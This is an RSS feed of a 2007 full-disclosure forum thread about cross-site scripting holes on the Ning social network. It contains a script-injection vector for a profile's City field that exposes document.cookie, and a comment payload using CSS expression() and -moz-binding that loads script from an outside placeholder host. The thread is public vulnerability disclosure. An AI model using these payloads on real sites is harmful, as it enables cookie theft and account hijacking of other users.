<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Ning XSS hole</title>
        <description>PoC -&amp;gt; http://opensocialdemo.ning.com/profile/Suhail

Image:


My Profile -&amp;gt; Account -&amp;gt; City

It's vulnerable in the City field with the vector &amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;

Ning is supposed to be closing it in the next round of patches I believe.</description>
        <link>http://sla.ckers.org/forum/read.php?3,17281,17281#msg-17281</link>
        <lastBuildDate>Mon, 20 May 2013 16:58:30 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,17281,18565#msg-18565</guid>
            <title>Re: Ning XSS hole</title>
            <link>http://sla.ckers.org/forum/read.php?3,17281,18565#msg-18565</link>
            <description><![CDATA[a fun exercise in why partial censoring can be dangerous..<br />
<br />
spacing comparison can likely uncover more, but i haven't the patience for that ^^<br />
<br />
New Image:<br />
<img src="https://mavspace.uta.edu/axs2368/ningxssek3-2.png" class="bbcode" border="0" /><br />
<br />
-maluc]]></description>
            <dc:creator>maluc</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sat, 22 Dec 2007 07:40:03 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,17281,18082#msg-18082</guid>
            <title>Re: Ning XSS hole</title>
            <link>http://sla.ckers.org/forum/read.php?3,17281,18082#msg-18082</link>
            <description><![CDATA[That entire site is absolutely riddled with XSS holes.  Any place that allows styled user input (blogs, comments, etc.) allows expression() and  -moz-binding.<br />
This vector is what I came up with for comments (Mozilla and IE)...<br />
<pre class="bbcode">&lt;a style=&quot;x:expression(document.body.firstChild.nextSibling.setAttribute('src','http://yoursite.com/XSS.js'));-moz-binding:url('http://yoursite.com/XSS.xml#xss')&quot;&gt;&lt;/a&gt;</pre>
<br />
-Dan]]></description>
            <dc:creator>DoctorDan</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 09 Dec 2007 14:34:00 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,17281,17494#msg-17494</guid>
            <title>Re: Ning XSS hole</title>
            <link>http://sla.ckers.org/forum/read.php?3,17281,17494#msg-17494</link>
            <description><![CDATA[nice find]]></description>
            <dc:creator>hackathology</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 18 Nov 2007 06:50:00 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,17281,17281#msg-17281</guid>
            <title>Ning XSS hole</title>
            <link>http://sla.ckers.org/forum/read.php?3,17281,17281#msg-17281</link>
            <description><![CDATA[PoC -&gt; http://opensocialdemo.ning.com/profile/Suhail<br />
<br />
Image:<br />
<img src="http://img75.imageshack.us/img75/9183/ningxssek3.png" class="bbcode" border="0" /><br />
<br />
My Profile -&gt; Account -&gt; City<br />
<br />
It's vulnerable in the City field with the vector &quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;<br />
<br />
Ning is supposed to be closing it in the next round of patches I believe.]]></description>
            <dc:creator>Delixe</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 09 Nov 2007 01:08:20 -0600</pubDate>
        </item>
    </channel>
</rss>
